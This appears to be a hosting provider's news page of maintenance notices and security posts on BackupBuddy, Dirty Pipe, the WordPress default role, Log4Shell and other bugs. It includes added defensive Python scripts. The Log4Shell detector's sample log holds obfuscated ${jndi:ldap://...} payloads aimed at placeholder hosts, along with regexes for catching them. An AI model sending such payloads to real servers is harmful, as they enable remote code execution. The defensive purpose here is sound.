Brief scheduled maintenance December 16-17, 2023

Between 10:00 PM on Saturday December 16 and 4:00 AM on Sunday December 17 (Pacific time), approximately 25% of our hosting servers will be restarted. This will cause a brief interruption of service (less than 10 minutes) for those sites at some point during this 6 hour period.

You can follow the status of the maintenance on our system status page.


Brief scheduled maintenance September 29, 2023

Between 10:00 PM and 11:59 PM Pacific time on Friday, September 29, each of our hosting servers will be restarted. This will cause a brief interruption of service (less than 5 minutes) for each site at some point during this 2 hour period.

You can follow the status of the maintenance on our system status page.


Protection against the BackupBuddy file download bug

The authors of the popular BackupBuddy WordPress plugin recently announced a serious security bug (CVE-2022-31474, an arbitrary file download vulnerability) in many versions of their software.

This bug is being exploited by “hackers”, who have used it to download the private “wp-config.php” file from many WordPress sites. That file contains the database credentials and the authentication “salts”. With the salts, an attacker can forge WordPress login cookies and get into your dashboard without knowing any password; with the database credentials, they can modify your site’s database directly.

We’ve added firewall rules to block downloads of that file via the bug, but in addition, we’re taking the following steps to protect our customers who were using a vulnerable version of the BackupBuddy plugin at any point between August 26 and September 8:

  1. Changed the backend WordPress database password to a new random one; and
  2. Changed the WordPress “salts” in the wp-config.php file.

These are the steps recommended in the post by the BackupBuddy authors, so our customers don’t need to do this themselves. (The post also suggests an optional third step, but that doesn’t apply to most WordPress sites.)
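As an added example (not code from our hosting company or from the BackupBuddy authors), the Python script below performs the two remediation steps above against a wp-config.php: it replaces the eight authentication keys and salts and the DB_PASSWORD with fresh random values, refuses to run if any of the nine definitions is missing so that a site is never left half-rotated, and checks afterwards that none of the leaked values survive. The sample wp-config.php is constructed for the example. Note that rewriting DB_PASSWORD in the file is only half of step 1: the same new password must also be set on the database server (for MySQL, with ALTER USER), which the script cannot do, so it returns the new values to the operator.

```python
"""Rotate the secrets in a wp-config.php whose contents may have leaked.

Added example for the remediation steps above; not the hosting provider's
or BackupBuddy's own code. The sample config below is constructed.
"""
import re
import secrets
import string

SALT_NAMES = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
SECRET_NAMES = SALT_NAMES + ("DB_PASSWORD",)

# Characters safe inside a single-quoted PHP string: no quote, no backslash.
SALT_ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+[]{};:,.<>?/~"
PASSWORD_ALPHABET = string.ascii_letters + string.digits

# Constructed sample wp-config.php; the values are placeholders, not real secrets.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'example_db' );
define( 'DB_USER', 'example_user' );
define( 'DB_PASSWORD', 'OldLeakedPassword1' );
define( 'DB_HOST', 'localhost' );
define( 'AUTH_KEY',         'old auth key' );
define( 'SECURE_AUTH_KEY',  'old secure auth key' );
define( 'LOGGED_IN_KEY',    'old logged in key' );
define( 'NONCE_KEY',        'old nonce key' );
define( 'AUTH_SALT',        'old auth salt' );
define( 'SECURE_AUTH_SALT', 'old secure auth salt' );
define( 'LOGGED_IN_SALT',   'old logged in salt' );
define( 'NONCE_SALT',       'old nonce salt' );
$table_prefix = 'wp_';
"""


def _define_pattern(name):
    """Match define( 'NAME', 'value' ); with either quote style and any spacing."""
    return re.compile(
        r"""define\(\s*(['"])""" + re.escape(name) + r"""\1\s*,\s*(['"])(.*?)\2\s*\)\s*;"""
    )


def extract_secrets(config_text):
    """Return {name: value} for every secret definition present in the file."""
    found = {}
    for name in SECRET_NAMES:
        match = _define_pattern(name).search(config_text)
        if match:
            found[name] = match.group(3)
    return found


def random_secret(length, alphabet):
    return "".join(secrets.choice(alphabet) for _ in range(length))


def rotate_secrets(config_text):
    """Return (new_config_text, new_values). Raises if any definition is missing."""
    present = extract_secrets(config_text)
    missing = [name for name in SECRET_NAMES if name not in present]
    if missing:
        raise ValueError("cannot rotate, wp-config.php lacks: " + ", ".join(missing))
    new_values = {name: random_secret(64, SALT_ALPHABET) for name in SALT_NAMES}
    new_values["DB_PASSWORD"] = random_secret(32, PASSWORD_ALPHABET)
    new_text = config_text
    for name, value in new_values.items():
        # A replacement function keeps re.sub from interpreting '\' or '$'
        # in the new value (the alphabets exclude them anyway).
        new_text = _define_pattern(name).sub(
            lambda _m, n=name, v=value: "define( '%s', '%s' );" % (n, v),
            new_text, count=1)
    return new_text, new_values


def verify_rotation(old_text, new_text):
    """True when every old secret is gone and every name has a new, different value."""
    old = extract_secrets(old_text)
    new = extract_secrets(new_text)
    return all(
        name in new and new[name] != old[name] and old[name] not in new_text
        for name in old
    )


if __name__ == "__main__":
    rotated, values = rotate_secrets(SAMPLE_WP_CONFIG)
    print(rotated)
    print("verified:", verify_rotation(SAMPLE_WP_CONFIG, rotated))
    print("also set this password on the database server:", values["DB_PASSWORD"])
```

Rotating the salts invalidates every existing login cookie, which is exactly the effect described below: the next visit to the dashboard asks for the password again.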

The only difference affected customers should notice is that WordPress may ask for your normal password again the next time you login, rather than “remembering” you from a previous login.

If you’re using the BackupBuddy plugin on your site, it’s also a good idea to make sure you’re using the latest version of it — in fact, it’s a good idea to turn on automatic updates for all your plugins to minimize the risk of something like this affecting you.

Finally, keep in mind that we already make daily backups of your website at no extra charge. We never want to discourage people from making their own additional backups, but those extra backups are most useful if they’re stored in another location (not just on the same server you’re making a backup of). While investigating this, we noticed that most people using BackupBuddy are simply storing an extra copy on the same server, which doesn’t add much protection against data loss. If you make your own backups, you should ideally copy them to your own computer, or to an external location like Dropbox.

Our servers are not vulnerable to the March 2022 “Dirty Pipe” security bug

Customers have asked us whether our servers are vulnerable to the recent serious security bug CVE-2022-0847 (nicknamed “Dirty Pipe”) in the Linux kernel, which lets an unprivileged local user overwrite the contents of files they are only allowed to read, and from there take over the system. (The bug’s discoverer published a detailed technical write-up.)

The good news is that we don’t use the vulnerable versions of the kernel software on our servers (the bug affects Linux 5.8 and later, and was fixed in 5.16.11, 5.15.25 and 5.10.102), and we’ve verified in multiple ways that our servers are not vulnerable to this problem.
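For readers who want to check their own servers, here is an added example (not one of our verification methods, which the post does not describe) that tests a kernel release string such as the output of uname -r against the CVE-2022-0847 version ranges stated above. It is a heuristic: distributions backport fixes without changing the upstream version number, so a “vulnerable” answer for a distro kernel means “check the vendor advisory”, while a “not vulnerable” answer for a mainline-numbered kernel is reliable. Release candidates are not distinguished.

```python
"""Heuristic check of a kernel release string against the CVE-2022-0847
("Dirty Pipe") version ranges. Added example; not the provider's own tooling."""
import platform
import re

# Mainline facts: the bug entered in 5.8; the fix shipped in 5.16.11, 5.15.25
# and 5.10.102 and is in everything from 5.17 onward. Other 5.8 to 5.16 series
# had already reached end of life upstream and received no fix.
FIRST_AFFECTED = (5, 8, 0)
FIRST_FIXED_IN_SERIES = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}
FIRST_FIXED_MAINLINE = (5, 17, 0)


def parse_kernel_version(release):
    """'5.15.0-25-generic' -> (5, 15, 0). Distro suffixes are ignored."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError("unrecognised kernel release: %r" % release)
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)


def mainline_version_vulnerable(release):
    """True if the version number alone places the kernel in the vulnerable range.

    Caveat: distributions backport fixes without bumping the upstream number,
    so True for a distro kernel means "check the vendor advisory"; False for a
    mainline-numbered kernel is reliable. 5.17-rc1 to rc5 were vulnerable but
    parse as 5.17.0 here.
    """
    version = parse_kernel_version(release)
    if version < FIRST_AFFECTED or version >= FIRST_FIXED_MAINLINE:
        return False
    series_fix = FIRST_FIXED_IN_SERIES.get(version[:2])
    if series_fix is not None:
        return version < series_fix
    return True  # an affected series that never received the fix upstream


def check_running_kernel():
    """Convenience wrapper for the host this runs on; Linux only."""
    if platform.system() != "Linux":
        raise RuntimeError("CVE-2022-0847 is a Linux kernel bug; not applicable here")
    release = platform.release()
    return release, mainline_version_vulnerable(release)


if __name__ == "__main__":
    for sample in ("4.19.0-18-amd64", "5.10.101", "5.10.102-1", "5.15.0-25-generic", "5.17.0"):
        print(sample, "vulnerable by version:", mainline_version_vulnerable(sample))
```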

Protection against setting the WordPress default “role” to “Administrator”

If you use WordPress, and you allow strangers to register for WordPress accounts (which isn’t usually a good idea, but some plugins require it), it’s possible to accidentally configure it so that those new users get created as WordPress administrators. That can happen simply by choosing “Administrator” in the “New User Default Role” menu on the Settings → General page of the WordPress dashboard.

Allowing this at all is a serious flaw. It was supposed to be fixed in WordPress itself some time ago, but the option is still offered.

We don’t think it’s reasonable to ever create new users as “Administrators” by default, regardless of whether you have “anyone can register” turned on. (Even if “anyone can register” is turned off now, it would be easy to turn it on later without remembering to change the default role back.)

To make sure our customers’ sites stay secure, we’ve added some protections against this:

  • Setting the “New User Default Role” to “Administrator” is blocked at the Web Application Firewall (mod_security) level on our servers, whether from the WordPress dashboard or from any other web request;
  • If it somehow gets set anyway, our security systems will detect it as part of the daily security scan we do of every site;
  • If your site already had this setting as of today, we’ve restored it to the default “Subscriber” role.

Nobody should notice any changes as a result of this, but as always, don’t hesitate to contact us if you have any questions or difficulties.
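The firewall rule in the first bullet above, reimplemented in Python as an added example (it is not our mod_security configuration, which this post does not publish). It assumes the setting arrives, as it does from the Settings → General form, as a request parameter named default_role, and it looks in the query string, in a form-encoded body and in a JSON body so that an encoding other than the dashboard form cannot slip past; the JSON branch is a generalisation beyond what the dashboard sends. The sample requests are constructed.

```python
"""Reject any web request that would set WordPress's default_role option to
administrator, in whichever encoding the value arrives.

Added example mirroring the WAF rule described above; not the provider's own
mod_security rule. The sample requests are constructed."""
import json
from urllib.parse import parse_qsl, urlsplit

BLOCKED_DEFAULT_ROLES = {"administrator"}
PARAM = "default_role"


def _form_values(encoded, name):
    # parse_qsl percent-decodes names and values, so default%5Frole and
    # Administrator%20 are seen the way WordPress would see them.
    return [v for k, v in parse_qsl(encoded, keep_blank_values=True) if k.lower() == name]


def _json_values(body, name):
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, dict):
        return []
    return [str(v) for k, v in data.items() if k.lower() == name]


def sets_admin_default_role(target, content_type="", body=""):
    """True if the query string, a form body or a JSON body carries
    default_role=administrator (case-insensitively). The path is deliberately
    ignored: the block applies to any URL, not just options.php."""
    values = _form_values(urlsplit(target).query, PARAM)
    media_type = content_type.split(";")[0].strip().lower()
    if body and media_type == "application/x-www-form-urlencoded":
        values += _form_values(body, PARAM)
    elif body and media_type == "application/json":
        values += _json_values(body, PARAM)
    return any(v.strip().lower() in BLOCKED_DEFAULT_ROLES for v in values)


# Constructed sample requests: (target, content_type, body, expected_block)
SAMPLE_REQUESTS = [
    ("/wp-admin/options.php", "application/x-www-form-urlencoded",
     "option_page=general&default_role=administrator&_wpnonce=abc", True),
    ("/wp-admin/options.php", "application/x-www-form-urlencoded",
     "option_page=general&default_role=subscriber&_wpnonce=abc", False),
    ("/wp-admin/options.php", "application/x-www-form-urlencoded",
     "default%5Frole=Administrator%20", True),
    ("/some/other/path?default_role=ADMINISTRATOR", "", "", True),
    ("/wp-json/example", "application/json; charset=utf-8",
     '{"default_role": "administrator"}', True),
    ("/wp-json/example", "application/json", '{"default_role": "editor"}', False),
    ("/wp-admin/options.php", "application/x-www-form-urlencoded",
     "blogname=administrator", False),
]


def evaluate_samples():
    """Return (target, blocked) decisions for the constructed sample requests."""
    return [(t, sets_admin_default_role(t, ct, b)) for t, ct, b, _ in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for target, blocked in evaluate_samples():
        print("BLOCK " if blocked else "allow ", target)
```

The daily scan in the second bullet is the backstop for anything that bypasses the request path entirely, such as a direct change to the wp_options table: it checks the stored value of default_role rather than the request that set it.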

Our servers are not vulnerable to the December 2021 Log4Shell / Log4j security bug

Customers have asked us whether our servers are vulnerable to the recent serious security bug (called “Log4Shell”, CVE-2021-44228) in the Java logging library “Log4j”. The bug lets an attacker run code on a server simply by getting a string such as “${jndi:...}” into something the server logs, for example a browser User-Agent header.

The good news is that we don’t use the Log4j software anywhere on our servers, and never have. We’ve verified in multiple ways that our servers are not vulnerable to this problem.

That said, we always believe in “defense in depth” when it comes to security, so we’ve also added rules to our web application firewall that will block any IP addresses making attempts to exploit this bug.
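As an added illustration of that last step (this is not our firewall rule set, which the post does not show), the Python below scans Apache combined-format access-log lines for JNDI lookup strings in the request line, Referer and User-Agent, the three places the payload was typically sent, and returns the client IPs that sent them. It first undoes URL encoding and the Log4j lookup tricks (${lower:j}, ${::-j}, ${env:X:-j}) that attackers used to hide the literal “jndi”, since a rule that only matches “${jndi:” misses those. The log lines are constructed for this example.

```python
"""Find clients sending Log4Shell (CVE-2021-44228) probes in an Apache access log.

Added example, not the provider's WAF rules. The log lines are constructed."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Innermost Log4j lookups used to obfuscate "jndi":
#   ${lower:j} / ${upper:J} -> j        ${::-j} / ${env:NOPE:-j} -> j (the default value)
INNER_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text):
    """Percent-decode (twice, for double encoding) and collapse nested lookups
    from the inside out until nothing changes; each pass strictly shrinks the text."""
    text = unquote(unquote(text))
    previous = None
    while previous != text:
        previous = text
        text = INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def is_log4shell_probe(text):
    return JNDI_LOOKUP.search(normalize(text)) is not None


def parse_line(line):
    """Return (client ip, fields worth inspecting); unparsable lines are searched whole."""
    match = COMBINED.match(line)
    if match:
        return match.group("ip"), [match.group("request"), match.group("referer"), match.group("agent")]
    return line.split(" ", 1)[0], [line]


def probe_counts(lines):
    """Counter of client IP -> number of lines carrying a JNDI lookup."""
    counts = Counter()
    for line in lines:
        if not line.strip():
            continue
        ip, fields = parse_line(line)
        if any(is_log4shell_probe(field) for field in fields):
            counts[ip] += 1
    return counts


def ips_to_block(lines, min_hits=1):
    """Sorted list of IPs with at least min_hits probe lines."""
    return sorted(ip for ip, n in probe_counts(lines).items() if n >= min_hits)


# Constructed sample log (documentation IP ranges, no real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.5:1389/a}"
198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.9%2Fx%7D HTTP/1.1" 403 0 "-" "curl/7.68.0"
198.51.100.9 - - [10/Dec/2021:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 100 "${${env:BARFOO:-j}ndi:dns://198.51.100.9/x}" "curl/7.68.0"
"""

if __name__ == "__main__":
    for ip, hits in probe_counts(SAMPLE_LOG.splitlines()).items():
        print(ip, hits)
    print("block:", ips_to_block(SAMPLE_LOG.splitlines()))
```

Because the servers in question do not run Log4j, every hit is a scanner rather than a success, which is why blocking the source IP outright is a reasonable response here.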

Brief scheduled maintenance July 16, 2021

Between 10:00 PM and 11:59 PM Pacific time on Friday, July 16, each of our hosting servers will be restarted. This will cause a brief interruption of service (less than 5 minutes) for each site at some point during this 2 hour period.


Our servers are not vulnerable to the March 2021 Microsoft Exchange security bug

Recently, Microsoft announced several security bugs in its “Microsoft Exchange” email server software (the chain nicknamed “ProxyLogon”) that allow “hackers” to take control of the server from the Internet, install malware on it, and read private email.

Some customers have asked us whether our servers are vulnerable to this problem.

The good news is that we don’t use Microsoft Exchange (or any other Microsoft email server) software, and never have. That means our servers, and our customers who use our email services, are not vulnerable to this problem at all.

WordPress 5.5

WordPress 5.5 was recently released, and as always, we’ve updated our WordPress one-click installer to automatically install the latest version for new WordPress sites. WordPress 5.5 works fine on our servers (make sure you’re using a recent version of PHP for your site).

If you’ve previously installed an older version of WordPress, you should update it from within your WordPress Dashboard.

One great new feature of WordPress 5.5 is that it adds automatic updates of plugins and themes. We strongly recommend enabling this feature to improve the security of your site. To do that, just click “Enable auto-updates” for each of your plugins and themes on the Plugins and Themes pages of the dashboard.

Most WordPress sites that get “hacked” are broken into through a known, already-patched bug in an outdated plugin or theme, so that one setting is all it takes to prevent most of those attacks on your site.

Sites hosted with us aren’t affected by today’s “Let’s Encrypt” SSL security bug

We provide free Let’s Encrypt SSL certificates for all sites hosted with our company.

Recently, Let’s Encrypt found a bug in its certificate-issuing software (when a certificate covered several domain names, it re-checked the CAA records of only one of them instead of each one). Affected certificates were to be revoked at noon Pacific time today (March 4, 2020), which could cause site visitors to see security warnings if the certificate wasn’t renewed before then.

Our customers don’t need to worry, though. We’ve already renewed any affected certificates, so the problem will not affect any sites we host.

There’s a website at checkhost.unboundtest.com you can use to test your certificate if you want to be sure. As always, don’t hesitate to contact us if you have any questions.